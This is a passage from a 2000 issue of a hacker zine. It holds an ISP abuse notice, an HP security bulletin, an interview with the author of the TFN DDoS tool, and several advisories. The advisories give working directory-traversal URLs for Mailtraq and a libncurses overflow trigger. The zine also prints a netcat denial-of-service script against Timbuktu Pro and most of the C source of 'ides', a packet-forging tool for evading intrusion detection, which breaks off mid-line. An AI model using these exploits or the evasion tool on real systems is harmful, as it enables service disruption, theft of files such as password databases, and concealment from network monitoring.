[22:03] <p4ntera> =)
[22:03] <SugarKing> hahah
[22:03] <SugarKing> thanks for the interview d00dz
[22:03] <SugarKing> ok
[22:03] <p4ntera> heh
[22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?�)
Session Close: Thu May 04 22:04:39 2000
@HWA
xx.x How to get banned from your ISP for *legal* activity in Canada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 3 May 2000 12:41:14 -0400
From: abuse@rogers.home.net
To: m*@home.com
Subject: Rogers@Home Network Security Dept. notice - Unauthorized Access Attempt
Dear Mr. XXXXXXXXXX XXXXXX:
It has been brought to our attention that an attempt to gain access/issue
commands to a computer system without the consent of the owner was traced to
your provisioned IP address. This may be a deliberate attempt to access
these computers, or your machine may have been compromised, in either event
you must make sure your computer is not used for any prohibited activity.
Please look into this and feel free to email us should you have any
questions. I have included the logs and or/complaint below.
As a result of our investigation, we have also found several servers
operating on our network from your connection. As ALL servers are a
violation of our End User Agreement, please remove all servers immediately.
To avoid any interruption of service, please email us with confirmation once
you have permanently removed all servers.
Sincerely,
Rogers@Home Network Security Dept.
http://rogers.home.com/CustomerSupport/Surf-Safe.html
Apr 27 02:29:27 crow named[64]: unapproved query from [24.XXX.XXX.XXX].1041
for "version.bind"
Apr 26 23:36:43 fionn rpcbind: refused connect from 24.XXX.XXX.XXX to dump()
HTTP/1.1 401 Authorization Required
Date: Tue, 08 Jan 1980 17:13:46 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0RC1
WWW-Authenticate: Basic realm="Intranet"
Connection: close
Content-Type: text/html; charset=iso-8859-1
@HWA
18.0 [SEC] Security Bulletins Digest May 02nd 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To:BugTraq
Subject:Security Bulletins Digest (fwd)
Date:Tue May 02 2000 18:16:22
Author:Justin Tripp
Message-ID:<Pine.HPX.4.21.0005030816110.2128-100000@zap.ee.byu.edu>
---------- Forwarded message ----------
Date: Wed, 3 May 2000 04:48:08 -0700 (PDT)
From: IT Resource Center <support_feedback@us-support.external.hp.com>
To: security_info@us-support.external.hp.com
Subject: Security Bulletins Digest
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the IT Resource Center and would
like to be REMOVED from this mailing list, access the
IT Resource Center on the World Wide Web at:
http://us.itresourcecenter.hp.com/
Login using your IT Resource Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
Digest Name: Daily Security Bulletins Digest
Created: Wed May 3 3:00:03 PDT 2000
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9910-104 Sec. Vulnerability regarding automountd (rev. 01)
The documents are listed below.
-------------------------------------------------------------------------------
Document ID: HPSBUX9910-104
Date Loaded: 20000502
Title: Sec. Vulnerability regarding automountd (rev. 01)
-------------------------------------------------------------------------
**REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00104, 21 Oct 99
Last Revised: 2 May 2000
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: automountd can run user programs as root.
PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20 and 11.00.
DAMAGE: Allows users to gain root privileges
SOLUTION: Apply the patches noted below.
AVAILABILITY: Patches are now available.
CHANGE SUMMARY: This revision contains patch information.
-------------------------------------------------------------------------
I.
A. Background
This problem was originally reported in CERT Advisory CA-99-05,
regarding the vulnerability in automountd which allows an
intruder to execute arbitrary commands with the privileges of
the automountd process.
We had previously reported that Hewlett-Packard platforms were
not vulnerable; we now have new information showing that we
are indeed vulnerable.
**REVISED 01**
B.| Fixing the problem
|
| For HP-UX release 11.00 apply PHNE_20371,
| for HP-UX release 10.20 apply PHNE_20628.
|
| NOTE: There are various patch dependencies associated with
| this patch, and rebooting is required.
C. To subscribe to automatically receive future NEW HP Security
Bulletins from the HP IT Resource Center via electronic mail,
do the following:
Use your browser to get to the HP IT Resource Center page
at: http://itrc.hp.com
Under the heading "Maintenance and Support" click on the link
"More..." and at the very bottom of that next page, click on
"Support Information Digests" underneath the heading NOTIFICATIONS.
Now login on the IT Resource Center Welcome page, using your user
ID and password (or register for one). You will need to login
in order to gain access to many areas of the ITRC. Remember to
save the User ID assigned to you, and your password.
Once you are on the Support Information Digests Main page,
follow the instructions there.
To -subscribe- to future HP Security Bulletins or other
Technical Digests, click the check box (in the left column)
for the appropriate digest and then click the "Update
Subscriptions" button at the bottom of the page.
To -review- bulletins already released from our archive, simply
click on the link near the top of the list entitled
"HP Security Bulletins Archive."
or
To -gain access- to the Security Patch Matrix, select
the link for "The Security Bulletins Archive". Once in
the archive the third link is to our current Security
Patch Matrix. Updated daily, this matrix categorizes security
patches by platform/OS release, and by bulletin topic.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com
~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9910-104--------------------------------------
@HWA
19.0 [b0f] Latest releases from Buffer Overflow Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://b0f.freebsd.lublin.pl/
Not *everything* that is new has been published here. Check the site to
see what you may be missing, meanwhile a good cross section of b0f's new
releases is featured here in following sections, with a couple of advisories
first then some new code. - Ed
<Cont'd>
@HWA
20.0 [HWA] Informal chat/interview with Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mixter <mixter@newyorkoffice.com>
http://mixter.warrior2k.com/
Cruciphux <Cruciphux@dok.org>
http://welcome.to/HWA.hax0r.news/
Mixter is the author of TFN (Tribe Flood Network) software which was
recently brought into the limelight by Mafiaboy who used a variant called
mstream to attack some big name web sites and effectively shut them down
for several hours.
->
-> Technical Overview:
->
-> See Packetstorm http://packetstorm.securify.com
-> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
->
-> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
-> TFN is a powerful distributed attack tool and backdoor currently
-> being developed and tested on a large number of compromised
-> Unix systems on the Internet.
->
Sunday afternoon May 21st 2000.
[ For the most part un-edited so you can decide what is ]
[ interesting and what isn't, general chatter has been ]
[ removed and hostnames blanked out. ]
***** ADDENDUM/CORRECTION ***************************************************
[ NOTE: I was incorrectly under the assumption at the time of this interview
that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to
be false, in fact mstream (discussed elsewhere with source code) was used and
NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
******************************************************************************
Session Start: Sun May 21 13:13:43 2000
Session Ident: Mixter (mixter@*.net)
[13:19] <Cruciphux> what inspired you to write the TFN software?
[13:20] <Cruciphux> what where your goals, thoughts, intended uses
[13:20] <Cruciphux> :
[13:20] <Mixter> hmm
[13:20] <Mixter> well, I coded it for the same purpose I code everything,
because I simply like coding, and now or then you'll create something
important
[13:21] <Mixter> if not, coding something is always a new excercise for
yourself...
[13:21] <Cruciphux> you could code something but still not release it
publically, was it merely POC or did you expect it to be used?
[13:22] <Mixter> I've heard about these tools on irc like two years ago, at
least that people wanted to create them
[13:22] <Mixter> POC=? :)
[13:22] <Mixter> sorry I spend way too little time in usenet etc.
[13:22] <Cruciphux> Proof Of Concept
[13:22] <Cruciphux> np
[13:22] <Mixter> o
[13:23] <Mixter> no, the first version was just a nice powerful tool to
write up
[13:23] <Cruciphux> what is your view on the Mafiaboy debacle and how do you
feel about your software being used to attack major web sites?
[13:24] <Mixter> it was interesting to see this concept worked, and you
could contact hosts at a fast speed and with tunneling through raw packets
and all
[13:24] <Mixter> tfn2k, was however a pure POC.. any kiddie who tried to use
it will know how buggy it is :)
[13:25] <Cruciphux> can you explain the concept to us and how it works?
[13:25] <Mixter> I think, when the government and media forces need
something to puff out, they'll always find something
[13:25] <Mixter> if it wasnt for the dos attacks, it wouldve been something
else
[13:26] <Mixter> I believe all packet kiddies out there should get a life...
but they do more damage to irc servers and users than anything else, though
[13:26] <Cruciphux> true but it was you that made the tool available, they
may not otherwise have decided to attack these sites
[13:27] <Cruciphux> do you feel responsible at all?
[13:28] <Mixter> the plain concept of distributed attacks is to start
processes from a lot of hosts, simple as that. in distributed packet
flooding, you launch all processes against a single target. theoretically,
before all the tools came out, when people just logged on to a lot of shells
and run their udp/syn flooders against 1 target, that was the same stuff.
what the new programs do, raw tunneling, or encrypted tcp control
connections are just feature improvements to the same
[13:28] <Mixter> that they have a big impact on feasibility and speed of
distributed attacks and other things like distributed scanning
[13:28] <Mixter> hm ok :)
[13:29] <Mixter> its important to realize that the "authorities" biggest
instrument is false guilt
[13:30] <Mixter> people can't withdraw from it, and if they do, they're
still being persecuted.. so I believe that people like mafiaboy arent
innocent since they knew what they were doing, but simply sitting in front
of your home computer and typing in commands can hardly make you a
"criminal"
[13:31] <Cruciphux> would you extend that view to "hacking" also?
[13:31] <Cruciphux> whats your view on people who deface websites?
[13:32] <Mixter> if you talk about hacking as in breaking into servers, I
have no ethical problems with it as long as it is for the cause of improving
the security, e.g. patching and/or notifying the people
[13:33] <Cruciphux> so you are ok with non destructive intrusion so long as
you patch the hole you came in through?
[13:33] <Mixter> website defacements in general are destructive, because
they can harm companies by destroying their images.. so it isnt something
people should do.. exceptions are of course sites that stand for violation
human and individual rights
[13:33] <Cruciphux> what if the system is borrowed to say, host a bot on irc
or launch further intrusion attempts?
[13:34] <Cruciphux> yes I personally believe that socio-politcal defacements
with a valid message are justifiable
[13:34] <Mixter> well, I DONT recommend intrusion at all in these big
brotherish times, it's far more easy to do productive, legal work, by
working for a company or founding your own one, but lets say I have no
problem with it, if no damage is created
[13:35] <Cruciphux> what other software are you working on presently?
[13:35] <Mixter> if they hack systems to host a bot, that's a pretty
clueless and dangerous way... if they HAVE to intrude or if they dont have
the small money, the only acceptable way is to contact the administration,
notify them of the problem and ask for resources in exchange for securing
their site
[13:36] <Mixter> yeah.. it's pretty lame though, when you see some
anti-human-rights site defaced, and you have in black on gray one line of
text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
[13:36] <Mixter> ;/
[13:37] <Cruciphux> considering the little cost involved in offering a
hacker system resources in exchange for securing a server it seems strange
it doesn't happen more often
[13:37] <Mixter> well, security software, auditing software and more.. the
problem is I can't disclose that without permission from my employees, and I
wouldn't break my agreement
[13:37] <Mixter> err employers
[13:38] <Cruciphux> you currently are employed in the security field, were
you ever a grey-hat?
[13:38] <Cruciphux> i suppose thats a round about way of asking if you have
hacked yourself in the past
[13:38] <Mixter> yes it does.. but the whole thing is based on trust, and if
it would become practice that hackers outline vulnerabilities and then get
local access (from where they have LOTS of insider attacking possibilities),
most people would have a problem trusting them
[13:39] <Mixter> heh.. well yeah, I broke into hosts without permission in
the past
[13:39] <Cruciphux> trust is earned however and the notification of
intrusion would be a demonstration of intent
[13:39] <Mixter> at the beginning of my carreer, I started out with
developing eggdrop/tcl (not for takeover, just for defense and fun for the
most part)
[13:39] <Cruciphux> how old are you?
[13:40] <Mixter> that was 2 1/2 years ago.. I hadn't a clue about the legal
issues back then, and wasn't even certain if what I was doing is illegal
[13:42] <Mixter> ah, the notification of intrusion could also be used as a
social engineering (<- stupid term :P) method, to get the trust, and then
attack them from the inside with their consent :>
[13:42] <Cruciphux> how did you get into computers? what was your intial
exposure? first machine?
[13:43] <Mixter> no, I don't care about that, after about 50 news agencies
published name, address, birthdate, and photos of me back in february :P
[13:43] <Cruciphux> k
[13:45] <Cruciphux> how did you get into computers? what was your intial
exposure? first machine?
[13:46] <Mixter> my initial exposure was a c64 I used when I was about 6-8
yrs old
[13:46] <Mixter> i programmed a lot in basic, some machine language later :)
[13:47] <Cruciphux> Are you self taught or do you have any official
schooling in programming etc?
[13:47] <Mixter> if people wouldnt all start with big PC OS's like windows,
they'd probably figure out programming and the ins and outs of computing
much better and faster...
[13:47] <Cruciphux> yeah I started on a vic-20
[13:47] <Cruciphux> wrote a bbs on it
[13:47] <Cruciphux> it had 4k ram
[13:47] <Mixter> oh well, the nice feds took away my computer back in 98
[13:48] <Cruciphux> for what?
[13:48] <Mixter> i hadnt had a pc for 3 months, that was when I read awful
lots of programming, networking etc books and really got into the technical
aspects
[13:48] <Mixter> for installing some bots on a couple of hosts :]
[13:48] <Cruciphux> *g*
[13:49] <Cruciphux> thats about it really, thanks for yer time, any closing
comments?
[13:49] <Mixter> hey, nobody's perfect. I really *was* clueless about the
tracing stealthing etc aspects of hacking, leave alone the legal stuff back
then.. just exploring and doing anything I could :)
[13:49] <Cruciphux> :-)
[13:49] <Mixter> nope, if you dont have any closing questions ;)
[13:49] <Cruciphux> when I sold my first c64 system, the guy that bought had
nagged and nagged me
[13:50] <Mixter> hehe
[13:50] <Cruciphux> for some phreaking software i had, I finally gave in and
let him have it warning him not to
[13:50] <Cruciphux> actually use it unless he learned how it worked etc
[13:50] <Cruciphux> he called me a week later
[13:50] <Mixter> phreaking is something nice.. I really wish I could've done
it in the time and/or country when it was feasible and not too dangerous
[13:50] <Cruciphux> he was busted and had the $750 system confiscated
[13:50] <Cruciphux> :)
[13:51] <Mixter> aw :)
[13:51] <Cruciphux> I was into it when I was younger
[13:51] <Cruciphux> it was fun
[13:51] <Mixter> i spent $3000 on my first PC
[13:51] <Cruciphux> yeh same here
[13:51] <Mixter> the one that got confiscated ;x
[13:52] <Cruciphux> I paid $900 for a used 9M hard drive for my c64 bbs and
$1000 for the USR 9600 external modem
[13:52] <Cruciphux> heh
[13:54] <Cruciphux> funny thinking about a 9 megabyte hard disk these days,
it was the size of a ups
[13:55] <Cruciphux> actually it might have been 7M
[13:55] <Cruciphux> anyways we're all done i'll ttyl - thanks
Session Close: Sun May 21 13:55:44 2000
END
@HWA
21.0 [b0f] b0f3-ncurses.txt FreeBSD 3.4 libncurses buffer overflow by venglin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2000-04-24
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
Severity: setuid programs linked with libncurses
can be exploited to obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com
* The Problem
lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
* Vulnerable Versions
- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
@HWA
22.0 [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by axess 2000-04-12
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 2
Advisory Name: NetOp, Bypass of NT Security to retrieve files
Date: 12/4/00
Application: NetOp Remote Control
Vendor: Danware
WWW: www.netop.dk
Severity: Any user can browse and even download
files from the remote computer
Author: axess ( axess@mail.com )
Homepage: www.b0f.com
* Overview
NetOp is a remote administrator control tool that allows you to capture
the screen and it will act as if you were infront of it.
Its a client / host based software.
* The Problem
By default there is no account set up for verify that you are authorised to use
the host software running on the server and anyone that has an client for it can
access the screen.
Default port 6502 is used.
I have done a lot of testing of this and found out that most of the people running
it dont use the accounts that can be set up to verify with an account and password
that u are allowed to use the host.
They rely on the NT security with locking the screen that should be enough.
So if we log on we get a normal screen that says login with administrator account.
Not easy to bypass, but then there is a function that you can use called file transfer.
I use that method and a screen that looks like explorer will appear and you can download
sam._ or what ever file you want and start cracking it while just bypassing all
the NT security.
* Vulnerable Versions
Version 6 is the only one tested but i beleive all versions
prior to that is vulnerable.
* Fix
6.5 has just been released and uses the NT security that will fix this problem.
copyright � 1999-2000
axess , buffer0verfl0w security
www.b0f.com
@HWA
23.0 [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by slash 2000-03-22
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 1
Advisory Name: Mailtraq remote file retriving
Date: 3/22/00
Application: Mailtraq 1.1.4 for Win 95/98
Vendor: Fastraq Limited
WWW: www.mailtraq.com
Severity: Any user can browse and even download
files from the remote computer
Author: slash (tcsh@b0f.i-p.com)
Homepage: www.b0f.com
* Overview
Mailtraq is a message server aimed at individuals, small and medium sized
companies and home offices (SOHOS). Mailtraq�s primary goal is to provide online
services to local users by storing incoming and outgoing news and mail messages
offline, then connecting to the Internet at controlled intervals to deliver
outgoing messages and collect and store incoming messages. Mailtraq provides fully
featured Mail, News and Intranet services, full disk logging of all activity,
comprehensive firewall facilities plus many other services such as a Finger client,
Mail-to-News and News-To-Mail gateways, Web Administration, etc. Mailtraq requires
either the Windows NT (Server or Workstation), Windows 95 or Windows 98 operating
systems to be running on the machine on which it is loaded.
* The Problem
By default Mailtraq installs it's Webmail Administration menu which is
accessible via http://some.domain.com/$/admin . The problem accoured when We tried
to retrive http://some.domain.com/ We configured Mailtraq's WWW server root directory
to be C:\Program Files\Mailtraq\websys\webmail Since that \websys\webmail directory
doesn't contain index.html the server returned the complete file listing of the
directory C:\Program Files\Mailtraq\websys\webmail. So we tried to exploit this a
little bit, and discovered that anyone can browse and download files on the remote
computer running Mailtraq Mail Server. Here is how to exploit it:
http://127.0.0.1/./../../../
And You should get the complete listing of of files in c:\Program Files\ . When We
tried to exploit this, we could only browse files from c:\Program Files\ . When we
would add some more /../../../ to the exsisting URL we would get a "404 Page not
found". We played around with this a little bit and found a way to exploit this too.
To get to windows we should add some more /../../../ but a correct directory name
was required. So we did it this way:
http://127.0.0.1/../../../../../../../../../../././../../././..././.../.../windows/
Here it is!!! The complete listing of C:\windows . Now this is as far as we go.
On Windows NT machines running Mailtraq You could just get sam._ , run l0phtcrack
against it and compromise the machine.
There is also a bug that allows the remote attacker to find out in what directory
is Mailtraq installed in. By inputing a large string after http://some.domain.com/
the server will return the path to Mailtraq's installation directory. Exsample:
http://127.0.0.1/../aaaaaaaaa[a lot of a's]aaaaaaa
The output You should get will look like this:
File "C:\Program Files\Mailtraq\websys\webmail\aaaaaa[a lot of a's]aaaaaa" could
not be found
* Vulnerable Versions
We tested version 1.1.4. on Windows 98. All versions prior to 1.1.4 are
vulnerable. We aren't sure if the Windows NT version is affected.
* Fix
At this time we aren't familiar with any fix for this bug.
copyright � 1999-2000
slash, buffer0verfl0w security
www.b0f.com
@HWA
24.0 [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding to connections
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
# *Needs netcat in order to work......*
# Immune systems:
# Timbuktu Pro 2000
#
# Vulnerable systems:
# Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto)
#
# Exploit:
# - Connect and disconnect to port TCP/407 and port TCP/1417 will start
# listening.
# - Connect on port TCP/1417 (using a simple telnet client).
# - Disconnect from TCP/1417 (with no data exchange).
#
# Workaround:
# - Kill Timbuktu process (using pslist/pskill for example).
# - Stop Timbuktu services.
# - Start them again.
echo "Exploit:"
echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening."
echo " - Connect on port TCP/1417 (using a simple telnet client)."
echo " - Disconnect from TCP/1417 (with no data exchange)."
echo "Coded: eth0 from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo "Checking if host is actually listening on port 407"
telnet $1 407 1>.timb.tmp 2>.timb.tmp &
echo "Sleeping 5 seconds..."
sleep 5
killall -9 telnet 1>/dev/null 2>/dev/null
cat .timb.tmp | grep "Connected" >/dev/null 2>&1
if [ $? -eq 0 ]; then
timb="1"
echo "[$1] is listening on port 407..."
echo "Exploiting:..."
nc $1 1417 1>/dev/null 2>/dev/null
sleep 3
killall -9 nc 1>/dev/null 2>/dev/null
echo "Done!!"
fi
if [ "$timb" != "1" ]; then
echo "[$1] Is not listening on port 407 = doesn't exist..."
fi
@HWA
25.0 [b0f] ides.c:'Intrusion Detection Evasion System'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* ides version 0.3 - 'intrusion detection evasion system'
* (c) Jan 2000 by Mixter
*
* IDES will go into background and watch incoming traffic, inserting forged
* TCP ack, rst and fin packets for every transmitted data packet. The sessions
* will not be affected, since the sequence numbers change, but all sniffing
* and monitoring software that evaluates raw packets is possibly tricked into
* evaluating the forged data or seeing reset connections, making logging
* unreliable or impossible. As a second feature, IDES will create a custom
* amount of fake SYNs on each valid tcp connection request, transparently
* simulating coordinated/decoy scans from random source addresses.
* IDES can be used on a remote host or locally to fool sniffers, IDS and
* other network monitors and to generate random decoy probes while scanning.
* Acknowledgements: MUCH of this idea is from stran9ers (private) code, which
* is better to configure, and from horizons article in Phrack 54.
*
* Changes:
* v 0.3 - code sanitized, prevent generation of ACK storms/feedback loops
* v 0.2 - now uses a unique XOR (ph33r) challenge value for each process
*/
#define DECOYS 10 /* number of forged SYNs to send on each
tcp connection initiation */
#undef DEBUG /* stay in foreground + dump packet info */
#undef NO_INADDR /* solaris */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifndef IP_HDRINCL
#define IP_HDRINCL 3
#endif
#ifndef PF_INET
#define PF_INET 2
#endif
#ifndef AF_INET
#define AF_INET PF_INET
#endif
typedef unsigned char u8;
typedef unsigned short int u16;
typedef unsigned int u32;
#ifndef NO_INADDR
#ifndef in_addr
struct in_addr
{
unsigned long int s_addr;
};
#endif
#endif
#ifndef htons
#if __BYTE_ORDER == __BIG_ENDIAN
#define ntohl(x) (x)
#define ntohs(x) (x)
#define htonl(x) (x)
#define htons(x) (x)
#else
unsigned long int htonl (unsigned long int hostlong);
unsigned short int htons (unsigned short int hostshort);
unsigned long int ntohl (unsigned long int netlong);
unsigned short int ntohs (unsigned short int netshort);
#endif
#endif
#define IP 0
#define TCP 6
#define RAW 255
struct sa
{
u16 fam, dp;
u32 add;
u8 zero[8];
}
sadd;
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
u8 ihl:4, ver:4;
#else
u8 ver:4, ihl:4;
#endif
u8 tos;
u16 tl, id, off;
u8 ttl, pro;
u16 sum;
u32 src, dst;
}
*ih;
struct tcp
{
u16 src, dst;
u32 seq, ackseq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, res2:2;
#else
u16 doff:4, res1:4, res2:2, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
u16 win, sum, urp;
}
*th;
unsigned short ip_sum (unsigned short *, int);
unsigned short
ip_sum (addr, len)
unsigned short *addr;
int len;
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(unsigned char *) (&answer) = *(unsigned char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
char rseed[65535];
int rcounter = 0;
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline long
getrandom (int min, int max)
{
if (rcounter < 2)
random_init ();
srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
u32 magic;
char packet[1024], *dh;
#define GETLRANDOM (getrandom (0, 65535) * getrandom (0, 65535))
#define CLONED ((ntohl(th->seq) == (ntohl (ih->src)^magic)))
void
syndecoy (int s)
{
#ifdef DEBUG
printf ("*");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
ih->src = htonl (GETLRANDOM);
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = 0;
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 1;
th->ack = 0;
th->rst = 0;
th->psh = 0;
th->ack = 0;
th->urg = 1;
th->res2 = 0;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
memset (dh, 0, 256);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
}
void
idscrew (int s)
{
int flg = ((th->ack) && (!th->psh)), rl = getrandom (0, 256);
#ifdef DEBUG
printf (".");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = htonl (GETLRANDOM);
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 0;
th->ack = 1;
th->rst = 0;
th->psh = 1;
th->ack = 0;
th->urg = 0;
th->res2 = 0;
memset (dh, 0, 256);
th->ack = 0;
th->psh = 0;
th->rst = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
if (flg) /* this is necessary to prevent ev1l ACK st0rmz#@!$ */
return;
th->rst = 0;
th->fin = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl += rl;
th->fin = 0;
th->ack = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
th->psh = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl -= rl;
}
int
main (int argc, char **argv)
{
char *opt = "1";
int i = 0, s = socket (AF_INET, SOCK_RAW, TCP);
magic = GETLRANDOM; /* initialize our magic challenge */
ih = (struct ip *) packet;
th = (struct tcp *) (packet + sizeof (struct ip));
dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp));
#ifndef DEBUG
if ((i = fork ()))
{
printf ("%s launching into the background (pid: %d)\n", argv[0], i);
exit (0);
}
#endif
if (s < 0)
perror ("");
if (setsockopt (s, IP, IP_HDRINCL, opt, sizeof (opt)) < 0)
perror ("");
while (1)
{
if (read (s, packet, 1020) > 0)
if ((!CLONED) && (th->ack))
{
#ifdef DEBUG
printf ("Seq: %lu, ack: %lu, src: %lu (S%dA%dP%dF%dR%dU%d)\n",
